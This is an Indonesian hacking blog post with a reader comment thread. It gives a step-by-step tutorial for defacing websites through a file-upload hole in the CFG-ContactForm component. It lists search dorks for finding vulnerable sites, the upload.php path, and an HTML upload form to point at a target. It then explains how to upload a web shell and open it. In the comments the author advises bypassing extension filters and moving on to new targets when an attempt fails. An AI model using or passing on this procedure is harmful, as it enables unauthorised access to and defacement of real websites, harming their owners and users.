Saturday, 28 May 2016

eXploit CFG-CONTACTFORM VULNERABILITY FILE UPLOAD

Hello World; Pagi Fans, Please Say Hello Haters :*
yoeeh Gengs, Lanjut lagii Walking Blog :D ,karna ini hari sabtu, jadi Gua Post artikelnya pagi, karena Nanti malem mau malmingan gengs :'v wkkwkw.
Kali ini Nue akan Share Tutorial Deface dengan eXploit CFG-CONTACTFORM VULNERABILITY FILE UPLOAD.
Iseng2 Share eXploit Lawas, kali aja masih crootz xixixhihi, btw Sekalian nyicipin WebShell BACKBOX INDONESIA WEB SHELL V1.0 (BASED ON INDOXPLOIT SHELL) dari Kang hightech.


Play with Me , Baby <3


Dork:
"/cfg-contactform-1/" 
"/cfg-contactform-2/"
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)

# Disini exploitnya tergantung contact form yg keberapa mas bro,
/[path]/cfg-contactform-1/inc/upload.php

1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/cfg-contactform-1/inc/upload.php

3. Vulnerability ~ {"filename":" -001."}



CSRF Upload:
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>
*copy CSRF Upload nya, edit dan masukan target lu di "target", save dgn ekstensi .html
*Lalu buka dgn browser

4. Lalu Upload Shell Lu, Jika sukses akan Muncul nama Shell Lu.


bukan tukang PhP kok girls :'v wkkw
5. Shell Akses:/[path]/cfg-contactform-1/upload/namashell.php
*trgantung Dork yg digunakan BossQ ;3



untuk code PHP disini 

Nah kalo dah masuk ke shell, seterah dah sobat mo apain, bedah isi ampe usus2nya kek.
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) )) 
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai karya para WebMaster ;*

"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Btw yuk up2date tentang TKJ Cyber Art, di Official Account Line Kami: http://line.me/ti/p/%40hjl8740i
*bebas utk bertanya *sharing bareng *kepo2deh akwkwa #joinUs

Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")


bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak. 
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kamiTKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')

Happy Joomla Hacked~
Sekian dan semoga bermanfaat .. terimakasih

Source and thanks to:haurgeulis Security

./Nuenomaru


tidak perlu muncul ke permukaan , yang penting tetap bergerilya






Visit and follow :

FP         : TKJ Cyber Art
G+         : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM      : C0018D1A2
Line       : http://line.me/ti/p/%40hjl8740i

13 comments

Mas, saya belum ngerti apa itu [path].
Bisa di jelasin ?

aduh gimane ya jelasinnya, path itu dir yg ada di web..
salah satu contohny misalkan : config
target.com/path/exploitnya..
target/config//cfg-contactform-1/inc/upload.php <- cuma contoh, *path itu macem2 trgantung web targetnya.

ada juga yang gak make path,
jadi: targetlink/exploit <- gini yg gak make path

tinggal coba2 aja mz, kalo vuln ya langsung exploitasi :)

#Nuenomaru

itu kan ada csrf upload nya om,, langsung bae masukin shell ente disitu, coba baca step by step nya alon2 hihihih :D
sukses trs deh gan

#Nuenomaru

kalo cuma {"filename":""} gk vuln ya gan?

dicoba aja gan, sekalian coba2 bypass ekstensi shell nya
#Nuenomaru

Gan Gua Ada Banyak Shell Sapa Tau Mau my blog : http://zakirblogger.blogspot.com/ , jangan lupa berkunjung gan

oke tq om.
keep share yoo..

#Nuenomaru

om ane pas upload dah sucses tapi pas shell nya di panggil malah kgk muncul alias direct ke web solusi min ? :p

cari target laen dl yaw hihih
#Nuenomaru

Code php itu maksud nya buat code buat csrf upload file yg ext.php ya ??


EmoticonEmoticon